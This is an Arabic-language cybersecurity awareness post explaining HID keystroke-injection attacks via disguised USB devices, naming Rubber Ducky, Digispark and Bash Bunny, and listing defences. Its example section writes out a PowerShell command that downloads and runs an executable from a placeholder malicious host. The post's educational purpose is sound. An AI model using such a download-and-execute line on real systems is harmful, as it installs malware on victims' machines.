التصنيفات
الهاشتاجات
البومات الصور



فيديوهات











الهاشتاجات
لايوجد بيانات لعرضها
روابط ذات صله
Posted in مقالات برمجية وتقنية, مواضيع تقنية on أغسطس 04, 2025
ماهي هجمات HID
ماهي هجمات HID🤔؟
👈هجمات HID هي نوع من الهجمات السيبرانية التي تستخدم أجهزة صغيرة تشبه الفلاشات لتنفيذ هجمات خفية على الأجهزة. هذه الأجهزة يمكنها أن تنسخ كلمات السر والمعلومات الحساسة من جهازك، وتفتح "باب خلفي" يسمح للمخترق بالدخول متى شاء، وتنفذ أوامر معقدة تلقائيًا خلال ثوانٍ على جهازك.
ما هي هجمات HID؟
هجمات HID هي نوع من الهجمات الفيزيائية يتم فيها استخدام جهاز USB يبدو بريئًا (مثل فلاش ميموري أو شاحن USB)، ولكنه مبرمج ليعمل كأنه لوحة مفاتيح تُدخل أوامر خبيثة بسرعة بمجرد توصيله بالحاسوب.
👉 الهدف من الهجوم:
تنفيذ أوامر برمجية خبيثة (مثل فتح Terminal وتحميل فيروسات).
سرقة بيانات.
تعطيل النظام.
فتح "باب خلفي" (Backdoor) للمخترق.
💻 كيف تتم الهجمة؟
1. المهاجم يُبرمج جهاز USB خبيث باستخدام أدوات مثل:
Rubber Ducky
DigiSpark
Arduino HID devices
2. عند توصيل هذا الجهاز بجهاز الضحية، يتعرف عليه النظام كـ "لوحة مفاتيح".
3. يبدأ الجهاز بإدخال أوامر تلقائيًا بسرعات لا يمكن للمستخدم ملاحظتها أو إيقافها (في خلال ثوانٍ).
4. تنفذ الأوامر مثل:
فتح نافذة الأوامر (CMD أو Terminal).
تحميل ملفات خبيثة من الإنترنت.
تثبيت أدوات مراقبة أو برمجيات تجسس.
إنشاء مستخدم جديد بصلاحيات المدير.
🎯 أمثلة على أدوات تنفذ هجمات HID:
الأداةالوصف
Rubber Duckyجهاز يشبه فلاش USB لكنه يعمل كلوحة مفاتيح، يُبرمج بلغة بسيطة لإرسال الأوامر.
Digisparkلوحة إلكترونية صغيرة قابلة للبرمجة لتعمل كجهاز HID.
Arduino Leonardo / Microلوحات قابلة للبرمجة تستخدم في محاكاة لوحة المفاتيح/الفأرة.
BadUSBتقنية أوسع تشمل تعديل Firmware للفلاشات لتتصرف كسلوك مختلف تمامًا، مثل HID.
🎯 أمثلة على هجوم فعلي:
تخيل أنك تعمل على جهاز حاسوب في مكان عام أو داخل شركة، ويأتي شخص ما ويقول لك:
"هل يمكنني شحن هاتفي هنا؟"
فيعطيك شاحن USB أو جهاز صغير لتوصله… بمجرد التوصيل، الجهاز يعمل كلوحة مفاتيح، ويقوم بـ:
start cmd
powershell Invoke-WebRequest -Uri http://malicious.link -OutFile virus.exe
start virus.exe
كل هذا يحدث في ثوانٍ قليلة بدون أي تفاعل منك.
🛡️ كيف تحمي نفسك من هجمات HID؟
1. لا توصل أي جهاز USB غريب أو غير معروف المصدر بجهازك.
2. فعّل إعدادات تأمين USB من BIOS/UEFI (تعطيل HID عند الإقلاع).
3. استخدم برامج مراقبة مدخلات USB مثل:
USBDeview
G Data USB Keyboard Guard
4. تقييد صلاحيات الأجهزة الجديدة في أنظمة تشغيل المؤسسات.
5. استخدم أجهزة USB موثوقة فقط، خاصة في بيئات العمل.
6. تثبيت برامج الحماية التي ترصد نشاط الأوامر التلقائية.
☝️أداة Bash Bunny: جهاز اختراق متكامل
أداة Bash Bunny هي واحدة من هذه الأجهزة التي تشبه الفلاشات العادية، ولكنها في الواقع جهاز اختراق متكامل. يمكنها أن تنفذ هجمات خفية على الأجهزة، وتنسخ كلمات السر والمعلومات الحساسة، وتفتح "باب خلفي" يسمح للمخترق بالدخول متى شاء.
✌️برمجة الفلاشات العادية
يمكن برمجة فلاشة عادية لتقوم بنفس الوظيفة تقريبًا، مما يزيد من خطورة هذه الهجمات.
👌حماية الأجهزة
- تجنب استخدام الفلاشات غير المعروفة.
- استخدم برامج الحماية والكشف عن الفيروسات.
- قم بتحديث نظام التشغيل والبرامج بانتظام.
- استخدم كلمات مرور قوية ومتغيرة.
👏الوعي السيبراني
يجب أن تكون حذرًا عند استخدام الأجهزة والفلاشات، وعدم الثقة في أي شيء يبدو مألوفًا. يجب أن تكون على دراية بالتهديدات السيبرانية وكيفية حماية نفسك منها.